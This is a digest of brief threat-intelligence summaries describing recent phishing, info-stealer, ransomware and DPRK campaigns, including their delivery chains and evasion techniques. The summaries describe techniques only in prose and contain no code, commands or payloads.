A sophisticated JavaScript-based credential harvesting campaign has been discovered, utilizing fake voicemail notifications to capture Microsoft 365 credentials. The attackers employ HTML smuggling, obfuscation, and encryption techniques to evade detection. The phishing emails contain PDF attachments with QR codes and HTM files with embedded JavaScript. The malicious code uses base64 encoding, CryptoJS for encryption, and dynamic URL generation to redirect victims to a fake Microsoft 365 login page. The campaign involves multiple stages, including CAPTCHA and media player mimicry, to increase legitimacy. This evolving threat poses significant challenges for automated detection and analysis systems.

A new malicious campaign targeting booking websites has been discovered, utilizing LummaStealer, an info-stealer operating under a Malware-as-a-Service model. The attack employs fake CAPTCHAs to trick users into executing malicious PowerShell commands. Initially targeting the Philippines, the campaign has expanded globally, focusing on malvertising. The infection chain involves a fake booking confirmation link, obfuscated PHP scripts, and payload download mechanisms. LummaStealer samples in this attack are significantly larger, up to 350% increase in size, and use techniques like Binary Padding and Indirect Control Flow for evasion. The campaign's sophistication and global reach indicate a growing threat in the cybercrime landscape.

A new Rust-based ransomware called FunkSec has emerged, claiming to use artificial intelligence in its development. First appearing in 2024, it demonstrates a mix of sophisticated capabilities and developmental inconsistencies. FunkSec implements advanced features like XChaCha20 encryption and comprehensive anti-VM techniques, but also shows peculiarities such as dependency on downloading a specific wallpaper image. The malware disables Windows security features, establishes persistence via scheduled tasks, and targets multiple file extensions. It employs various evasion techniques, including disabling event logging and real-time protection. The ransomware's execution reveals technical anomalies, suggesting it may still be in development and could evolve further.

A phishing campaign combines ClickFix and multi-stage malware to deploy a modified Havoc Demon Agent. The attack starts with an HTML attachment using ClickFix to deceive users into executing malicious PowerShell commands. The malware stages are hidden behind SharePoint sites, and a modified Havoc Demon uses Microsoft Graph API to obscure C2 communications. The attack chain includes sandbox evasion, Python shellcode loader, KaynLdr for DLL loading, and a customized Havoc Demon DLL. The threat actor creates two files in SharePoint for C2 communication, encrypts data with AES-256, and supports various malicious commands. This campaign demonstrates the integration of public services with modified open-source tools to evade detection.

This article examines advanced obfuscation techniques used in popular malware families like Agent Tesla, XWorm, and FormBook/XLoader. The techniques include code virtualization, staged payload delivery, dynamic code loading, AES encryption, and multi-stage payloads. The malware uses a three-stage process: an encrypted payload in the PE overlay, a virtualized payload using KoiVM, and a final payload that is typically Agent Tesla or XWorm. The obfuscation methods aim to evade sandbox detection and hinder static analysis. The article provides insights into extracting configuration parameters through unpacking each stage and discusses potential automation opportunities for sandboxes performing static analysis.

The Black Basta and Cactus ransomware groups have incorporated BackConnect malware into their attack strategies to maintain persistent control over compromised systems. The attackers use social engineering tactics, including email flooding and impersonation of IT support, to gain initial access. They exploit Microsoft Teams and Quick Assist for unauthorized access and privilege escalation. The malware is deployed through abuse of OneDriveStandaloneUpdater.exe, which side-loads malicious DLLs. The attackers utilize commercial cloud storage services to host and distribute malicious files. Since October 2024, most incidents occurred in North America and Europe, with the US being the most affected. The manufacturing sector was the primary target, followed by financial and real estate industries.

North Korean threat actors, particularly from the Lazarus Group, continue to utilize Astrill VPN to conceal their IP addresses during attacks. Recent infrastructure and logs from the 'Contagious Interview' subgroup confirmed ongoing use of Astrill VPN in their operations. Google's Mandiant and Recorded Future's Insikt Group have also reported on DPRK threat actors' preference for this VPN service. Silent Push analysts have developed a 'Bulk Data Feed' of Astrill VPN IPs, updated in real-time, to help protect against threats. The research includes confirmation of Astrill VPN usage in recent attacks, including the $1.4 billion ByBit heist. A sample list of active Astrill VPN IP addresses is provided, with more comprehensive data available to enterprise users.